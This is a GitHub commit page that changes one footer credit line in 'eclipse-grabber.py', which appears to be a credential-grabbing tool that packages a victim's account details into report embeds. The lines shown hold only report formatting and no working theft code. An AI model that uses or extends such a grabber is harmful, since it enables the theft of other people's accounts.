Skip to content
This repository has been archived by the owner on Jun 7, 2022. It is now read-only.

Commit

Permalink
update: embed footer
Browse files Browse the repository at this point in the history
  • Loading branch information
3ct0s authored Jan 22, 2022
1 parent 601d8d0 commit ef94f20
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion code/eclipse-grabber.py
Original file line number Diff line number Diff line change
Expand Up @@ -179,7 +179,7 @@ def embed_accounts_info(accounts: List[Account], host: Computer) -> List[dict]:
"icon_url": account.avatar_url
},
"footer": {
"text": "Eclipse Grabber by @3ct0s and @JM1k1",
"text": "Made by @3ct0s and @JM1k1",
}
})
return embeds
Expand Down

0 comments on commit ef94f20

Please sign in to comment.